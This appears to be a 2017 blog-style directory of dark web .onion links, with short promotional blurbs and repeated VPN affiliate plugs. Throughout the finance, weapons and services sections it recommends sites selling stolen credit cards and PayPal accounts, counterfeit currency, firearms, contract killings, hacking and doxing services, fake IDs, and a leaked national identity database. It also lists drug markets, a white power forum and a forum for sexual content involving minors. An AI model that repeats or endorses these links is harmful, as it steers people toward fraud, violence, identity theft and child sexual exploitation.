+http://lm4rarblsx5yyimd.onion/ Finance/Card Automated Paypal and Credit Card another deep web marketplace where you can buy PayPal Account by Bitcoin or Paypal.
+
+http://bjjkaebas6uywama.onion/ Finance/Card CuberFreak Card the World: By the help of This Tor directory you can buy Any major Gadgets and Gifts cards related to any major sites like Amazon, Ebay.
+NordVPN 2
+
+Note: Service available in all world
+
+http://saulcctopd6jwfrp.onion/ Finance/Card Saul GoodMan: This deep web links offering clone American and European credit card by Bitcoin. Note: Here you can make payment via Escrow Service, Which make this site more trustable.
+
+http://debyrrafbkwqdg22.onion/ Finance/Card Deby Card: This website is most trusted Debit card seller since 2013, and having long list of customer. If you want to buy debit cards, then you can check out this deep web sites.
+
+http://eqnbwy4b4k4lrlq5.onion/ Finance/Cards Credit Card Number Checker: This Deep web sites provides unique service. I mean here you can check your card validity..but I am not how much this website is secure. Here I want to recommend you, dont put your personal card detail here only try when you buy any card dump from deep web.
+
+http://dugonj4mglbrusq6.onion/ Finance/Bitcoin Safe Pay BTC: This deep web links offering you with a way to pay for your online transactions without worry. His per transaction fee is 1.5%.
+
+http://dollarsfn45wiq4f.onion/ Finance/Money USD4YOU Best Note on The Market This deep web sites offering all USA Dollars into very cheap price and can make your 100$ to $300 or $400.
+
+http://65px7xq64qrib2fx.onion/ Finance/Card Low Balance Cards: This is a unique type deep web sites which sells USD balance credit card into cheap price which you can use on any website, and you can buy anything from online. Site admin also will provide you working PIN for the transaction.
+
+http://apple5e3lqymppzp.onion/ Bitcoins 100 * Your Coins: Another scam site which offers 100 multiplier service, I already told you previously this type status. Dont fall in his trap. They are the biggest scammer on deep web.
+
+http://guttenbdoe4mzk6k.onion/rates.html Money/Counterfeit Guttenbergs Print: Do you know, deep web has some special type websites which offer currency conversion system, or currency sell or buy service on cheap price. If you are interested in this and looking any dark web sites then check out this deep web links and can buy Dollars and Euros into Cheap price.
+
+http://hasx6qftht3mnzfz.onion/ Money/Counterfeit Has No Name: Another counterfeit site, which also offers money and card dump services, according to this deep web links, you buy European/Asian cards, American cards by cheap bitcoins price.
+
+http://vp5rhkntohnccxea.onion/ Finance/Bitcoin Hidden Wallet: Do you looking anonymous deep web service for bitcoin store and looking some trusted deep web links. You can try this site, by I want to recommend you, always try clearnet trusted bitcoin wallet service, dont use anonymous wallet service for long time hold.
+
+http://222rrzy7qx6qlrnb.onion/ Money/Counterfeit Hotdeal PayPal Accounts With Good Quality: Are you looking any good deals about PayPal account and also interested to buy new PayPal account, which have good PayPal balance then you can try these website, here you can buy approx $2K USD balance Paypal account into very cheap price.
+
+http://mastjorwqdvvpmgo.onion/ Finance/Bitcoin MasterCC: Do you looking credit card dump dark web link and want to buy some credit cards then this Tor links is best for you, this site offer all category credit card dump like as credit classic, credit silver, credit gold, credit signature.
+
+http://coincloo5wdlx2n7.onion/ Finance/Bitcoin CloudCoin: Do you have some black or dark bitcoins and do you want to get clean Bitcoin to exchange dark bitcoins then this deep web links can help you, but site taking fee which is random between 1.2% to 1.6%.
+
+http://usjudr3c6ez6tesi.onion/ Finance/Counterfeit USJUD: This is another counterfeit site, where you can buy dollars in very cheap price. According to this site all dollars are make in Asia. And You can spend these dollars into gambling machines, vending machines, small Western Union offices.
+
+http://fwx2oxihh3yi5eyu.onion/ Finance/Bitcoin Bitiply: According to this deep web links, here you can create multiple bitcoins by your coins and minimum bitcoins for transfer is 0.11 BTC. Note: Here I want to say one thing, dont believe these type fake sites and dont transfer your hard earning money to anyone wallet.
+
+http://4r23alxe7mwyqa4s.onion/ Finance/Bitcoin Double your BTC: Everyone want to make money double instantly, and this is the right example of scammers, according to this site, you can make your money double. Totally scam, not transfer any BTC to given address.
+
+http://qwmcl3jqq6bclzto.onion/ Finance/Bitcoin PayPal Coins Solution: these days mostly people are interested to make his money two-time within one days, do you think it is possible, According to me its not, and these type deep web links make fool lot of people every day. All these site are biggest scammer on the dark web. dont believe on these sites.
+
+http://tqi5om65lgzpej3y.onion/ Finance/Paypal Make a PayPal Transfer: Do you know some deep web links offer PayPal money transfer into very cheap price. This website also offers this site service, here you can buy some PayPal amount into half price, you can use that amount anywhere on the internet. For some proof, site also ready for show some screenshot, but I dont know how to believe on these type site.. but if you believe, then you can do your action here. Offer price $500 = $250, $1000 = $500 and $2000 = $900.
+
+http://paypalacfi5pv4t2.onion/ Finance/Paypal PayPal: same as upper given deep web links, this site also offer service related to Paypal, but this site doesnt offer balance, according to this dark web site, here you can buy high PayPal balance accounts into very cheap bitcoins price. For more information, you can check http://paypalacfi5pv4t2.onion/accounts.php link.
+
+http://buddygyxom7som6u.onion/ Finance/Paypal PaypalBuddy: Another deep web sites which offer hack PayPal account credit card dump of you want to buy both type service then this website can help you..
+
+http://omertavzkmsn6tp6.onion/ Finance/Card Jockers Stash: This deep web links also offer credit card dump, if you have any questions about dumps pr CVV then you can participate into forum threads, and you can find right answers for your question.
+
+http://eurocfshftwvoqw2.onion/ Finance/Counterfeit HQER High Quality Euro Replicas/Counterfeits: This is another good deep web links which offer Euro selling and buying, do you want to buy some Euro into very cheap price then this is the right place for you.
+
+http://ql5mduvendoreqxx.onion/ Finance/Paypal VendorPal: This website provide service for PayPal accounts, website have some high balance Paypal account information into homepage, which you can buy in very cheap BTC price.
+
+Movies, Games, Torrents, Music Deep Web Links 2017
+
+Everyone likes watching movies, listen to songs and also play games, If you also like type action and looking some good resources on the deep web, This section can provide you some good deep web links which offer these type service.
+
+As compared to normal surface internet, deep web not has sufficient resources which providing movies, music, games service, but I searched a lot on the deep web and found some good dark web links. If you are highly desperate for deep web, and want to join these type stuff into the anonymous environment, bellow given deep web links can present you some good contents.
+
+By these given dark web links, you can download movie, music, radio, games anonymously and can enjoy.
+
+Note: Before visiting these links, I want to describe one thing, bellow given links may have some mind disturbing contents, if you not like then please leave this website right now. . I am presenting this content only for education or research purpose. If you have done anything illegal, by given deep web links, then you are the responsible for your all activity.
+
+Attention: Never browse deep web without NordVPN Tor Over Server + Tor Browser. If you think you are safe with Tor browser, then you are totally wrong. Tor doesnt provide you complete privacy security, for best anonymity and complete privacy, always access deep web sites with best VPN software.
+
+Note: Recommended article for how to access the deep web safely.
+
+http://demonhkzoijsvvui.onion/files/ Torrent/Movies Demonoid.ph: I think you already know about this great torrent site, Demonoid.ph also having .onion version site by which you can access into tor network(anonymously). This hidden wiki link have big number of torrents database.
+
+http://torrentbktntawbh.onion/ Movies ??????? ????????? ?????????, ??????, ????: I think this is russian movie library, I dont having any experience of this deep web sites.
+
+http://uj3wazyk5u4hnvtk.onion/ Torrent/Movies The Pirates Bay: This deep web sites having millions of active torrent where you can download anything which you want like: Movies, TV shows, Software and etc.
+
+http://duskgytldkxiuqc6.onion/ Example rendezvous points page Thomas Paines Common Sense and The Federalist papers
+
+http://sblib3fk2gryb46d.onion/ Traum library mirror 60GB of Russian and English books. A mirror of the latest Traum ISO. Covers, search and downloads in FB2, HTML and plain TXT
+
+http://kpynyvym6xqi7wz2.onion/files.html ParaZite Collection of forbidden files and howtos (pdf, txt, etc.).
+
+http://c3jemx2ube5v5zpg.onion/ Jotunbanes Reading Club All your ebooks are belong to us!
+
+http://tmdwwwebwyuuqepd.onion/ Torrent Torrents.md: This is non English torrent deep websites, but here you can get unlimited amount or torrent links.
+
+http://wbyi72yt6gitdcqd.onion/ Torrent/Movies NewsFileSearch.com: I dont have any experience about this deep web links, but according to website here you can get HDTV, DVD Rip, Full Mp3 Songs.
+
+http://wtwfzc6ty2s6x4po.onion/ Torrent/Movies This is another popular deep web torrent website, but this site having limited users 3964, If you want to signup here then you need to wait some time.
+
+http://zmovietoropzaid3.onion/ Movie Zmovie: Do you want to download movies or TV shows from deep web. If yes, Zmovie can help you because this deep web sites provide latest movies and TV shows HD quality videos, which you can download from Zmovie. Note: when I tried to download a movie from this deep web sites but I faced problem-related to download links(download link not working), and all links drive on normal clearnet sites.
+
+http://d5eyi24facorsljv.onion/ Movie/Show Welcome to deep web Ponies: Do you like ponnies toon show, and want to download and watch all seasons episodes then this deep web links can provide you all seasons episode download links.
+
+http://www.solarmovie6rystf.onion/ Movies Watch free online movie solarmovie: Another deep web sites, which can prove a good alternative for Zmovie deep web link, If you are still searching movies site the you also can try solarmovie.
+Music Radio Deep Web Links 2017
+
+http://artifaxdeep.torpress2sarn7xw.onion/ Movie/Music/Radio Artifix Radio: Do you love music and want to listen live tracks on deep web, If yes then visit this dark web links and listen live tracks. According to websites, here you can listen music 24/7, and this radio station have live DJ 10am to 4pm EST. If you have any track and you are online right now then you can request for any track by chat.
+
+http://radiocbsi2q27tob.onion/ Movie/Music/Radio Another deep web site which also offer services related to music, but I didnt try this site before and also not have any experience with this site, If you have any information and want to share with us then leave comment.
+
+http://a4yedjgciupu7zzt.onion/ Movie/Music/Radio GNUMP3d: I love this site and visited many times, I this deep web links because, this is offer multiple radio station on single platform. Sites have more than 70+ unique radio station which you can play which you want. And site also have some extra functions.
+
+http://663wbgqczxp445am.onion/ Movie/Music/Radio Index of/: This deep web links offered FTP based directory access and listed directory have great amount music tracks collection and all are sorted according to alphabets, which can help you to find right track quickly.
+
+http://zohaq6hhk2p52c7d.onion/ Movie/Music/Radio Offair Darknet Radio: This dark web links also associated with music, here you can list live streaming music.
+
+http://kurdox4tfzujxddq.onion/ Movie/Music/Radio Radio Jobiwan: If you are still looking radio dark web sites, then you also can try this links, here you can find some tracks, which you can play by the help of front given play button.
+NordVPN 2
+
+http://76qugq4pb42lpgwx.onion/ Movie/Music/Radio Deep Web Radio: This dark web links similar like as upper given site Radio Jobiwan, Here you can can get information about radion information, like how to mount station and station related other information. Deep web Radio also offers anony player service, also providing information how you can configure into your streaming player like as Mplayer or VLC player.
+
+http://5slxqzbtjz5uu4pt.onion/ Movie/Music/Radio AnonUK Radio Network: Another site for radio or music category, this dark web site also offering service globally on the dark web, IF you want to access this radio station and want to listen some UK news then you can visit this site.
+Games Deep Web Links 2017
+
+http://6lw4pg2wsy475d7q.onion/ Games Apophenia: Do you want to something crazy on dark net then this tor directory can help you, here you can win bitcoin by the help of giving simple questions answer.
+
+http://bettorzztykidrx2.onion Games Bettor: This Tor Directory is offering betting service If you like betting on Football, Basketball, Tennis the check out this site and win good amount of BTC.
+
+http://theches3nacocgsc.onion/ Games TheChess: looking some entertaining, and has good knowledge about Chess then this deep web links is only for you, play chess game anonymously with any users.
+
+http://betcoinahk4j27yb.onion/ Games Hidden BetCoin: Do you want to make some fun on the deep web, and looking any type games online. If yes, check out given website links and play casino games. Hope you will enjoy on this website, for more information about games the you also can visit this deep web sites.
+
+http://5p6dpc344vsbigv7.onion/ Games PHDCasino: Do you love casino games and want to play some casino games on the deep web, if yes then this dark web links can offer you some great games information which you can play right now. This website has more than 500+ online casino games.
+
+Note: I am not recommending you, these type games site may be fake or scam.
+
+http://rswwpapessp3xxpw.onion/ Games Online Shans: +Another deep web links for make fun, but this complete site is written in Russian language, if you know Russian and also interested into casino then this will be good site for you.
+
+http://bettorzztykidrx2.onion/ Games BetTor is leading marketplace for selling winning bets in deepweb! Dont confuse with the sports predictions; we provide you 100% WINNING BETS in football, basketball or tennis. Hope this deep web links can provide you best winning chance in betting.
+
+http://grc43ygyy3iy5vxh.onion/ Games Killer-GeMex: This deep web sites offer killer Gemex game live console, these type sites is not a good choice to visit because these type dark web sites need your action and action can fall you in danger.
+
+http://hg5km4y37lgir6r3.onion/ Games Euro Buk Simulator 2014: This dark web links still working since from 2014, but now webpage does not have any type information, Only has one hyperlink and given hyperlink also scam.
+
+http://sntfgwfami5fdbn5.onion/ Games Sonic & Tails: Are you aware with Sonic games, If yes and want to play that games on dark web then this dark web sites can help you. Here you can download sonic & tails games into your local computer.
+
+http://hideout6eiazeoyp.onion Games The Hideout: Another dark web links which are related to games, but this site also offers anonymous chat service, if you want to make some fun right now then visit here.
+
+http://hzssn2ryi3hj7tah.onion/ Games Deep Web Games Stop: Do you love games and always interested in new games and want to buy then this deep web site is a great shop where you can buy latest games into half market price.
+
+http://hsv47rw3y6r3h5ji.onion/ Games/Betting Best Bets: This site only for those type person who are interested into betting, If you are? Then you can try to visit best bets deep web links.
+
+http://ghostbookdoyyvrs.onion/ Games/Betting Ghost Books: This is very popular deep web sites, where you can find bettings related service, but according to site visit, Site offering bettings on then Football, South Korean football, politics, united states.
+
+http://fixedlwgc3burzts.onion/ Games/Betting European Leagues Fixed Matches: Do you believe into just in make money and also interested into betting the this deep web links can help you, because this site offers fixed matches information. According to site, they are not offering information after analyze, but they will share internal information.
+
+http://wvxwdchqvprqfkl4.onion/ Games Lucky Bitcoins: Another gambling deep web sites, here you can win 2.4 BTC, According to website, here you can play by very tiny amount of bitcoins and tip number 1 to 10 then you may win!!.
+
+http://torbet777o4era3q.onion/ Games TorBet777: This is very interesting sites, I am saying this thing because, website saying Bet While Viewing Sexy Photos Totally Anonymous, means you may win money via only view sexy photos. Look like pretty cool.
+
+http://bet4winf2rjaitd4.onion/ Games/Betting Bet4win: Similar websites like as fixed matches, here you can get winner team information, by which you can make huge amount of money by bettings. They are offering information about Soccer, football, boxing and etc.
+
+http://3r7ailix2glqhrwb.onion/ Game Another alternative betting dark web links which offering information about football winner teams. If you are interested into these type information and want to win big amount of money then you can visit this deep web links.
+
+Deep web links | Deep web sites | The Deepweb 2017 | The Hidden Wiki url
+ddwan51
+Weapons, Hack, Phreak, Anarchy (internet), Warez, Virus, Crack Deep Web Links
+
+Every day, darknet got more than thousands of weapons, warez, virus, hacks related deals, and these numbers still growing day to day. I am sure if you are here, you already looking some good deep web links which offering such type services (Weapons, Hack, Phreak, Anarchy (internet), Warez, Virus). bellow I am giving you, these type best darknet markets which are trusted and some people already dealing with these hidden wiki sites.
+
+Warnings: You are not safe if you are browsing deep web sites without VPN Software. For very best anonymity and complete security always use NordVPN with Tor Over Server with Tor Browser. If you are thinking Tor Browser provides you total security, you are totally wrong. Tor Browser doesnt provide you best anonymity and complete security.To browse safely always run NordVPN with Tor Browser before accessing any deep web link.
+
+http://gunsjmzh2btr7lpy.onion/ Weapons Guns Dark Markets: This deep web markets having good no of gun or any other weapons-related listings. Available some major categories are Pistols, Assault Weapons, Full Auto Rifles, Submachine Guns, Sniper Rifles, Grenade Launchers and etc.
+
+http://gunsdtk47tolcrre.onion/ Weapons UK Guns and Ammo Stores: Available products are Glock 19, Walther P99, Bullets for Glock 19, Walther P99
+
+http://g4r2pz2r22ztdcsm.onion Weapons Black Markets: If you are looking something big into weapons categories then checkout this darknet market, here you can find best weapons, drugs, Counterfeit, Fake cards and many more.
+
+http://2kka4f23pcxgqkpv.onion/ Weapons EuroGun: when I visited this deep web links, I saw 3 listed product here which are Walther PPK, Kal.7,65; Desert Eagle IMI, Kal.44; SIG Sauer P226 AL SO DAO, Kal. 9mm, If you looking both type guns then checkout this hidden deep website.
+NordVPN 2
+
+http://mke3j4vlpo3ccmu4.onion/ Weapons/Services Russian Mafia: This deep web sites offering killing, hitting, beating and contract higring for murders services, if you are looking such type services then Russian mafia is the best place for you.
+
+http://armoryx7kvdq3jds.onion Weapons TheArmory: This deep web links having great amount of weapons-related listings, I think if you looking big guns market then this may prove best alternative for you, available major categories are Pistols, Rifles, Shotguns, Military, Police, Armor and etc.
+
+http://7p4phtqnrzrg5ju5.onion/ Weapons BlackGhost East Europe Stuff: This is another place where you can buy Guns, Mainly I saw here AK 47 Russian Guns, If you want to buy AK 47 then visit here.
+
+http://dtkeubgx47jeqvag.onion/ Weapons Best Gun Market: This website having more than 1000+ listed products and all are military grade weapons.
+
+http://vi5ydynhfco62g4v.onion/ Weapons Glocks & Taurus: looking some great small pistols for your personal use, this deep web site having more than 25+ alternatives and all are well-known products.
+
+http://iir4y0mndw2dec7x.onion/planet CardersPlanet First carding service from russian community. Credit cards, bank accounts, DDoS servicedeep web links
+
+Commercial Service Marketplace Hidden Wiki Tor Onion Directories
+
+If you are looking commercial marketplace tor directory links then check out bellow given deep web links, these links having some very popular hidden wiki sites like Anonymous forum, Amazon deep web sites, Hidden BitCoin marketplace, Sheep Marketplace and many other tor hidden deep web links. Hope these links will prove helpful for you.
+
+Note: I am not recommending you, visit these websites, I only add these sites here for education purpose or freedom information, this is total on your risk, but I am recommending you here before visit any deep website make sure focus on your privacy Security.
+
+Recommended: For better security use NordVPN Tor Over Server + Tor Browser. ( Always run both software before access hidden Internet)
+
+http://oiiuv2gwl2jhvg3j.onion/ Service/Killer/Hacker BesaMafia: Do you want to Hire Killer or Hacker then check out this deep web sites.
+
+http://bjjkaebas6uywama.onion/ Service/Cards/Gadgets CuberFreak Card the World: By the help of This tor directory you can buy Any major gadgets and Gifts cards related to any major sites like Amazon, Ebay.
+
+Note: Service available in all world.
+
+http://eqnbwy4b4k4lrlq5.onion/ Service/Cards This deep web site provides unique service, I mean here you can check your card validity
+
+http://dugonj4mglbrusq6.onion/ Service/Finance Safe Pay BTC: This deep web sites offering you with a way to pay for your online transactions without worry. His per transaction fee is 1.5%
+NordVPN 2
+
+http://edsec5zn26zqjwry.onion/ Service Edsec: This is Edsec portfolio website, if you want to hire any security or hacking specialist, Edsec provide both type service on best price.
+
+http://en35tfp3p3a4wqwb.onion/ Services/IDCards USFakeID: Do you want to make your US Driving License Card then check out this website, here you can find all US states fake driving license service.
+
+http://doxtorg7natnwyz5.onion/ Service The Doxtors Service: If you want to here any Dostor for Doxing then check out this hidden deep web links.
+
+http://agenttoe2dlvxdei.onion/ Service Agento Service deep web links is give a chance to investigate anyone or hack any email with in very short time, If you are looking these type service Like Traveling Internationally+Stay, Private Investigation, Life Ruining, Email Hacking, then you can try this onion directory.
+
+ Tech Gadgets Deep Web Store
+
+If you like latest gadgets and want to buy these gadgets by BTC then you can use any bellow deep web links, bellow given gadget stores tor links are self hosted, before buy gadgets make sure check store policy and reviews. I have added all working links deep web store.
+
+Note: My purpose to share this information is to provide information only for education purpose. I am not recommending you in anyway visiting these deep web sites. Access these deep web sites at own your risk. I recommend you to double check your privacy security setting before visiting deep web links / dark web sites.
+
+Warning: Dont trap into false sense, Tor Browser doesnt offer you complete privacy safety. To maximize your privacy security and anonymity, always run NordVPN software with Tor Browser before accessing deep web sites.
+
+http://akvilonom27p5hvb.onion/ Gadgets If you want to but any electronic gadgets like Tab, Laptop, Smartphone, Computer and etc, then this deep web sites will proving helpful for you.
+
+http://atlas777hhh7mcs7.onion/ Technology/Others Atlas: This is a web application program by which you can know about currently running relay, and running port.
+NordVPN 2
+
+http://amazonfkuuy6g3ou.onion/apple-phones.php Gadgets DeepTech: If you love gadgets then you also love this deep web gadgets store, here you can buy Apple iPhone, Tab, Mackbook, Computer, Laptop, Camera and many other things.
+
+http://35flmpspwpnarbos.onion/ Gadgets Appleworld: This darknet sites having largest amount of listed products like iPhone, iPad, Macbooks, iMacs and others.
+
+http://ljekq2ejc62q76dy.onion/ Gadgets iStore: This is another deep web links which having latest Gadgets which you can buy via BTC.
+
+Non-English Deep Web Links:
+Czech / Cetina
+
+http://qyy2n2lqpc5l524q.onion/ PirateLeaks.cz Czech website based on Wikileaks
+Top of Page
+Danish / Dansk
+
+http://oj3nqbmyudyl4mgn.onion/ DanishChan This focused on Imageboard and these boards are well managed and categorized according to category
+
+http://4eiruntyxxbgfv7o.onion/snapbbs/43f25a73/ Danish Drug Trade
+Dutch / Nederlands
+
+http://ie4hf3qxzoazywoi.onion/ Voetbalfan
+Finnish / Suomi
+
+http://zitanihpqsvi2lav.onion/ Sipulilauta | A chan
+http://zqiiraewuapgbsos.onion/ Thorlauta | Successor to Torlauta
+http://xxieg3mbvoh26pvs.onion/ Blue Quarters | Advice regarding to BitCoins, Silk Road Online, ordering anonymously, staying anonymous in deepweb etc
+http://r33rs4kqbjvdxuk2.onion/ Blue Quarters Forum | Discussion forum
+http://v7ovl2hciwt72lqi.onion/forum/ Suojeluskunta | White Power Forum
+French / Français:
+
+http://l4tay4mx3vyjdn4i.onion/ Je suis Kalila | Weird website
+German / Deutsch:
+
+http://6jzwxsoxmlefkkkl.onion/ Das ist DEUTSCHLAND hier | discussion forum with no specific topic
+http://7pwhaqsxbjdj27gx.onion/ TAZ Archiv | A daily updated archive of the TAZ (German newspaper) starting from 2009-05 maybe with some days missing
+http://7ymfzygewl4n6usp.onion/phpBB3/index.php Hmm? | Forum for warez and uncensored talk
+http://ar3ubs6cg6an4ylt.onion/ beaglesnoop German tor blogs for hidden news
+http://deurfnquin7mvni2.onion/ Pyrowiki | Pyrotechnics and drug wiki
+http://j4ddjgxetfx2ybcx.onion/ Geheimkanal | Imageboard. (Partially 18+)
+http://qdsuildbdofkrhe3.onion/ Safety101 | Computer saftey board. Some English
+http://jbsex4wngjpo5i27.onion/ Jailbait Sex Forum | Jailbait Sex Forum
+http://torlinq7wg2c3u4w.onion/ Flachbrustkanal | Brett für flache Brüste
+Hebrew
+
+http://xqz3u5drneuzhaeo.onion/users/samim/ Samim.onion marketplace for sell and buy drugs in Israel(bitcoin)
+NordVPN 2
+Polish / Polski
+
+http://vjelr2xdaqsgslzr.onion/ Torowisko | Pilish Forum can access without registration
+http://rzb5nlpvy5oqnket.onion/ Fundacja Panoptykon | Foundation to generalized surveillance, and trends intensification of supervision and control over society
+http://2wjsnwzoeiae4iyf.onion/1984_pl/Rok_1984.html George Orwell | Polish translation of the well-known novel
+http://pibn3ueheubjxv2z.onion/wiki/index.php/Start Polska Ukryta Wiki | Polish Wiki Tor Community
+http://uaga3aoawaj6hohg.onion/ Backup NWO | Collection of most intrested article and News
+http://cwesjxczvcvwvapz.onion/ Ksiega Urantii | Only about true news
+http://n2qxamb4ujm53cas.onion/ Krzysztof Brejza | Interesting Stuff for enjoy
+http://qubsrxat5qsaw5u5.onion/ Polska Cebulka | Polish Network blogs and Deep Web Links Directories
+http://ont6bv4bg7rtgaos.onion/ Polish hidden site on the Tor network
+http://nemlq3kd36frgvzp.onion/ Torkazywarka
+http://nemlq3kd36frgvzp.onion/forum/ Forum about scams , virtually, weapons and hacking
+http://xlmg6p4ueely7mhh.onion/ TorKnight | Polish forum which can access only registred User
+http://w56hjpxn45yzohqa.onion/ 56 Dog Days | Ramblings
+http://dts563ge5y7c2ika.onion/Onionsearch/ Onioon Search | Poland Search engine, and can add your deep web sites links
+Slovak / Slovenský
+
+http://y4bzva6k3l2l7rla.onion/ Child pornography : Its just an excuse | Why is the fight against child pornography pretext for something else
+Spanish / Español
+
+http://2dn2dmxt5uwnxz3j.onion/ Abusos | Abuses in Spanish
+http://kd6qr7xh42coxooq.onion/ T0rtilla | Chat platform in Spanish
+http://s6ccouvybf3ysmb2.onion/ CebollaChan | Tor Spanish collaboration platform
+http://xqz3u5drneuzhaeo.onion/users/tortilla/ T0rtilla | Shoutbox webchat. (Direct FH URL)
+http://uqtinqynmibpoa2s.onion/ Forocoches 2.0
+Swedish / Svenska
+
+http://fcnwebggxt2d3h64.onion/ Moral.Nu
+http://wd43uqrbjwe6hpre.onion/ KognitionsKyrkan Spritual Stuff
+http://zce2gyru25cvynqc.onion/zg/ ZG Projektet
+
+Extra Deep Web Links Updated 2017
+
+Here is the list of some popular deep web sites links, which mostly used but not lie into popular categories (like as drugs, blogs, books, weapons, Porn, marketplace). If you are looking these type active deep web links then this section can provide you right information these type links.
+
+Note: Same as another category, here I also want to say you, bellow given some links also have mind disturbing content, if you not like these type stuff then I am highly recommending you, please dont visit these given links. All links only for information or research.
+
+For more security, I you are trying to visit bellow given links then run your NordVPN and connect any server which you like then run your Tor browser, If both are in run mode then you are ready to visit bellow given links.
+
+Note: If you dont have NordVPN then buy this great VPN service premium subscription, If you dont know, how to create secure environment for access the deep web then checkout step by step how to access the deep web guide.
+
+Lets have some fun..
+
+http://hss3uro2hsxfogfq.onion/news/ News Latest Deep web Updates and News, This Tor Link is a Part of notEvil Search Engine.
+
+http://abigispddied4mec.onion/ Other If you are tech savvy person, hope this link is having something useful for you.
+
+http://tuxwnbupvdnfnwnd.onion/ Other The ZeroBin paste encryption service
+
+http://blkbook3uvmlfmu3.onion/ Extra Tor Social Networking Community: Do you want to some fun on deep web then Social sites is a great alternative, for social site community you can sign up on this great deep web social sites.
+
+http://deadnotejlktdu6u.onion/ Extra Dead Note: This Darknet site you can access after sign up. I dont have this site experience.
+
+http://76qugh5bey5gum7l.onion/ Extra Deep Web Radio: When I visited first time this hidden wiki site. then I didnt understand how to run this radio vla vla vla vla etc.. Hope you can found something useful here.
+
+http://qbj5eznyjs5q7rok.onion/ Extra DevilFunding: This Deep Web Links can helping to fund, If you have any crazy project ideas, and want to collect some founds then this website will prove helpful for you.
+
+http://etnkdf2jsvc7vi4u.onion/ Extra This site title is It is a Mystery. I wasnt able see anything meaningful on this deep web sites webpage, hope you can see. If you know more information about It is Mystery, then please share with us.
+
+http://bq6reuo2mxnlf5jb.onion/ Extra If you want to see Jackblue Gallery then check out this deep web sites.
+
+http://u3ghkwxzofgid3vx.onion Extra/Jobs Jobs4Hacker: Are you looking some hacker for any task the checkout Jobs4Hacker deep web site, here you can post your Job then after posting any interested hacker can contact you.
+
+http://papersqqyihp5b6u.onion/ Extra/Documents MediaGoblin: when you will visit this hidden internet site, then you can saw here, site has good collection of journals and research paper. If you have interested in these type things, then you can try to visit this site and can read these documents.
+
+http://anna4nvrvn6fgo6d.onion/ Extra Anna is Sad: I think you dont know deep web also have some sites which offers some funny stuff, but these tor links dont offer any type funny stuff but if you want to donate some BTC to required person. Hope Anna is the right person but you also can donate me.
+
+http://kjk4qvgg6usnvwyh.onion/ Extra/Service Martin Kapplinger: This is self-service based deep web sites, this site admin name is Martin Kapplinger and he is a software developer, If you need his service any of your developing projects then you can contact him.
+
+http://kotnikdvbq6lnbfz.onion/ Extra/Service Nikola Kotur: Just like as Martin Kapplinger, this website also offer self-service, site admin name is Nikola Kotur, and he is a developer and provides his service on PHP, Python, Pascal programming language. If you are looking any developer from associated technology, then you can contact him.
+
+http://dweebyhexfberrix.onion/ Extra/Fun Dweeb Web: Are you getting bored now and want to make some fun on the deep web then here I am sharing with you one great link which having one funny game. For more information, you need to visit this deep web sites.
+
+http://syntaxeddtui6zkm.onion/ Extra Syntex: I dont know, this deep web links what is offering and how to deal with this site but I want to say when I visited this site then I saw some horrific images related to suicide, eating disorder, dissociation, self-harm. If you want to more, then you need to visit this deep web sites.
+
+http://torc5bhzq6xorhb4.onion/ Extra Turkish Citizenship Database: Today do you want to something crazy, If yes then I have one deep web links which offer Turkish Citizenship database. If you feel this information you can use user personally or officially on internet then you can try to visit this site. Date have information about National Identifier (TC Kimlik No), First Name, Last Name, Mothers First Name, Fathers First Name, Gender, City of Birth, Date of Birth, ID Registration City and District, Full Address.
+
+http://42xlyaqlurifvvtq.onion/ Extra/Service EndWare: According to this site, if you still looking developer for your project and want to hire anonymously then EndWare can help you. This self-hosted deep web sites admin name is Endwall, and he developed endware suite, which you can use for anonymity, privacy, and computer security.
+
+http://riotiakxtodn2gv5.onion/ Extra/Fun I love this dark web links because when I visited this site the first time, then I found one skelton dancing on the screen. Which look like so funny.. If you want to see something funny on the deep web, then you should try to visit this hidden wiki site.
+
+http://youmad6gb7kvr7if.onion/ Extra/Fun You are mad: I have one deep web links which also offer some funny thing, hope you will like, I love site music.
+
+http://wivfwn64tm3uaeig.onion/index.php Extra Daniel Krafts Website: Another blog which you can find on deep web, this site admin Daniel Krafts always share something interesting here, and here you also can find his project document, research paper, blog links and about him information.
+
+http://darknetco4i4prlp.onion/ Extra The Darknet Company: before this time, I didnt saw this links on deep web, but I found this links on one deep web links directory site and visit here then see, site have only contact form but I dont know how to use this contact form. If you know, please share with us, we will update for my readers.
+
+http://psychonaut3z5aoz.onion/wiki/Main_Page Extra PsychonautWiki: This is a wiki-based site here you can find information about Psychonautics, Visual effects, Cognitive effects, Miscellaneous effects, Psychedelics, Dissociatives etc.
+
+http://opalrwf4mzmlfmag.onion/ Extra Wow a name: This deep web links related to self-promotion, like site have admin Twitter account links and interesting file links and more. By the help of this menu you can browse available directory and can download available files.
+
+http://latln6xmsn7pax3v.onion/ Extra HBO Go/Now Accounts: This website offer HBO account, If you are interested to buy new HBO access account then you can buy here, per account offer price is $20.
+
+http://hbooruahi4zr2h73.onion/ Extra Hiddenbooru: this is another deep web sites which Information I dont have, if you want to know more about this site then visit here and type any test into search box and press enter.
+NordVPN 2
+
+http://thund5izs5eyl254.onion/ Extra Penis Enlargement at Thunder place: Every men wants to increase his penis size and also want to some questions answers related to penis enlargement. If you also have and looking some good deep web links then thunders place is best for you. Here you can know everything about penis and also can participate in available thread. This forum have more than of 100 thousands of an active member. Hope you will learn something new here.
+
+http://oq2pviecmwp4smrj.onion/ Extra Benvenuto!: I think this site are written in Italian language; thats why I cant tell you more about this deep web sites, if you know Italian then you can visit this site. If you found something interested here, and feel deepwebsiteslinks.com site readers also know then, please share all information about this link via the contact us page.
+
+http://onionbr5zulufnuj.onion/ Extra Onion browser to check: Are you new on deep web, and want to check your Tor browser status. Your browser is connected to the Tor network or not; then you can check your browser connection status with the help of given link.
+
+http://gfzw3wyc5lzbro4d.onion/ Extra/News Pitcairn News: This is deep web news site, which contains information and links about Pitcairn Island, Do you want to know more about Pitcairn Island then you should visit this deep web sites. But this site still not updated from last two year.
+
+http://sla2tcypjz774dno.onion/18yo.html Extra/Webcam According to this deep web links, site owner has accessed his girlfriend bedroom, If you want to also get his girlfriend bedroom access then you can buy here username or password and can watch every day live show. Note: I think this is fake site.
+
+http://mdj7ldtgoq22m3hi.onion/ Extra/Chat According to C4MTOR, This site offer private chat service, If you want to participate into this private chat show, then first your need to pay some BTC in given BTC address then you will get Chat show access username or password. Note: Always beware these type scams.
+
+http://fuckyouhwlpp3odw.onion/ Extra Fuck You: Ha ha ha, its such a funny site, when you visit this site then you got Go Fuck Yourself message. But without this message side didnt have any other information. Only time loss site.
+
